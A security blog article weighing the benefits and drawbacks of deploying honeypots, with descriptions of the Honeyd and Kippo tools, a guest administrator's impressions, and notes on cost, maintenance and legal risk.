There are many benefits of honeypots, most notably, they can significantly improve your security posture. As such, all organizations should consider implementing a honeypot and should assess the benefits of honeypots against the disadvantages.
This post covers the pros and cons of honeypots to help you decide whether a honeypot is appropriate for your organization.
What is a honeypot and why are they used?
A honeypot is an additional security protection that can be used alongside a firewall and other security solutions to help protect a network from hackers.
Honeypots, as the name suggests, are designed to catch a hacker’s eye so that their efforts will be drawn to attacking the honeypot rather than a system where they could cause serious harm.
They appear to be an easy entry point into a network to distract attackers from looking at other parts of the system. They are a deliberate hole in the security of the system that can be attacked without causing harm. They allow IT teams to gather valuable intelligence on hackers who are attempting to gain access to their networks.
In contrast to a firewall, which is designed only to keep external attackers out, a honeypot can also identify internal threats and attacks. Many companies are almost blind to attacks from within. A honeypot provides increased visibility and allow IT security teams to defend against attacks that the firewall fails to prevent. There are considerable benefits of honeypots, and many organizations have implemented them as an additional protection against internal and external attacks.
There are many benefits of honeypots!
A honeypot is a system that is set up with the singular purpose of being attacked. It is a system designed to be exploited, hacked, infected with malware, and generally abused by a malicious third party. Why should I do that you may ask? Well, there are many benefits of honeypots.
You may wonder why you should spend your time, effort, and money setting up a system that will attract hackers? Why you should deliberately create a system with weakened defenses that will be exploited? Why even attract interest from malicious third parties?
There are three very good reasons why you should. First. You will be wasting a hacker’s time, and time spent attacking a system that is safe is time not spent hacking a system that will damage your organization if the hacker succeeds.
Secondly, by setting up a honeypot you will be able to see who is attacking you and the methods that are being used. This will give you a very good idea of the types of attacks being used and the defenses you will need to install to protect your real systems and data from attack.
Thirdly, an attack on a honeypot is likely to frustrate a hacker and stop them from hacking your real computer systems.
Security researchers are well aware of the benefits of honeypots. They have been vital in the study of hackers’ behavior. They can be used to determine how systems are attacked and are also a very useful part of system defenses. It is not a question of whether you should set up a honeypot, but rather why you have not already done so.
There are many different types of honeypot that can be implemented. You can set up a dummy system with an entire network topology if you wish. You can have many different hosts, you can include a wide range of services, and even different operating systems. In short, an entire system can be set up to appear genuine and allow an attack to take place.
There are many different types of honeypot that can be deployed, although for the purpose of this article we have provided further information on two popular honeypots below: Honeyd and Kippo.
The Honeyd honeypot
This is a small daemon that can be used to create a network containing many virtual hosts. Each of those hosts can be set up and configured differently. You can run a range of arbitrary services on each, and configure them to appear as if they are running different operating systems. For network simulation purposes, you can create tens of thousands of different hosts on your LAN using Honeyd if you so wish. You can use Honeyd to hide your real system, identify threats, assess risk, and improve your security posture.
- Simulate multiple virtual hosts simultaneously
- Identify cyberattacks and assign hackers a passive-fingerprint
- Simulate numerous TCP/IP stacks
- Simulate network topologies
- Set up real FTP and HTTP servers, and even UNIX applications under virtual IP addresses
The lowdown on Honeyd
We invited a guest sys admin (Arona Ndiaye) to provide input on the Honeyd honeypot to get the perspective of a Linux administrator. She mainly uses Linux and *nix systems, and has tried out Honeyd to get an idea of how it works, what it can do, and its functionality. She installed it on Kali Linux, which was a simple process requiring a single line to be added to the sources.list file, running apt-get update & apt-get install honeyd.
A few tweaks were needed to ensure the firewall had the correct permissions set, along with some simple text editing in a configuration file. That was all that was needed. If any problems are encountered, or more detailed information is required, it is all available on the honeyd website. Most people find the easiest way to get started is to play with the system and to try to attack it, which is what she did.
She was particularly impressed with the information that can be gathered on attacks and scans. The methods of attack were recorded in intricate detail, including how it was possible to for hackers to fool NMAP. The overall verdict was “seriously impressive.”
The Kippo honeypot
We also put Kippo to the test; another popular honeypot. Kippo is used to create a dummy SSH server, which allows attackers to conduct brute force attacks. The honeypot can be set with a root password that is particularly easy to guess, such as a simple string of numbers: 123456 for example.
Set up the honeypot with an entire file system, or even better, clone a real system for added realism. The aim is to convince the hacker that he or she is attacking a real system. Once the attacker has successfully managed to login to the system, everything they subsequently do will be recorded. All actions will be logged, so it is possible to see exactly what happens when a system is attacked.
What is particularly good about Kippo is how detailed the fake system can be. You can really waste a considerable amount of a hacker’s time and get an accurate picture of exactly what they are trying to achieve, the files they upload and download, what malware and exploits they install, and where they put them. You can then use a virtual machine to analyze the attack in detail when you have the time.
Set up combo-honeypots to create a highly elaborate network
Both Kippo and Honeyd are open source, so it is possible to tweak both honeypots to suit your own needs and requirements. You can even combine the two to build up extremely elaborate networks – specifying specific file contents and creating fake systems that appear perfectly real. How much time you spend doing this, and the level of detail you want to add, is up to you. If you really want to find out exactly how the systems are attacked to better prepare your real system, these are exceptionally good tools to use.
Adding a honeypot can help to improve your security, but simply setting one up will not. Unfortunately, to gain the benefits of honeypots you will need to invest some time in setting up a realistic network and it will need to be updated and maintained. It must be treated like any other machine or system you use in order for it to be effective. You must also make sure that it is isolated or insulated. Creating a fake system that is easy to attack shouldn’t give a hacker an easy entry point into your real system!
Summary: Main Benefits of Honeypots
Listed below are the main benefits of honeypots:
- Observe hackers in action and learn about their behavior
- Gather intelligence on attack vectors, malware, and exploits. Use that intel to train your IT staff
- Create profiles of hackers who are trying to gain access to your systems
- Improve your security posture
- Waste hackers’ time and resources
- They show you that you are being attacked and that data is valuable when attempting to get budget increases for security.
Disadvantages of honeypots
We have covered the benefits of honeypots, but are there any disadvantages of honeypots apart from the time taken to set them up?
No system is perfect and there are notable disadvantages of honeypots. One of the main problems is the system is designed to be attacked, so attacks will likely take place. Once the honeypot is accessed it could be used as a launchpad for further attacks. Those attacks could be conducted on an internal system or on another company. Honeypots therefore introduce risk. There is therefore an issue of legal liability. If your honeypot is used in an attack on another business, you could be sued. The level of risk that it introduced will depend on the honeypot. Typically, the more complex the honeypot, the greater the risk is likely to be.
Then there is the question of the resources you will need to set up the system. If you want to create a realistic system that will fool hackers, it needs to look and behave like the real system it is designed to mimic. There are free options available which will make it more cost effective to set up a honeypot, although they still require resources. The hardware comes at a cost and they require maintenance and monitoring. The cost may be prohibitively expensive for some businesses.
That said, maintenance need not be major drain of time. In many cases, honeypots can be set up and left. Since there is no expected production activity, monitoring the honeypot and assessing activity will require minimal effort. Automatic alerts are generated when an attack is in progress and any data generated will likely be a real attack. Honeypots may be set up on existing old hardware that would otherwise not be used. In such cases, costs can be kept to a minimum.
Honeypots add complexity to a network, and the more complex a network is, the harder it is to secure. The honeypot could introduce vulnerabilities that could be exploited to gain access to real systems and data.
Finally, the honeypot can only tell you about an attack in progress if the honeypot is directly attacked. If an attack involves other systems and they honeypot is untouched – for instance if the honeypot was identified as such by the attacker and avoided – it would be necessary to rely on other mechanisms to identify the attack.
Whether the benefits of honeypots outweigh the disadvantages will depend on the nature of your business, how probable it is that attempts will be made to attack your network and the resources you have available for security. Your money could be better spent on other security solutions and your IT team’s time may be better directed to monitoring other systems and addressing vulnerabilities and patching software.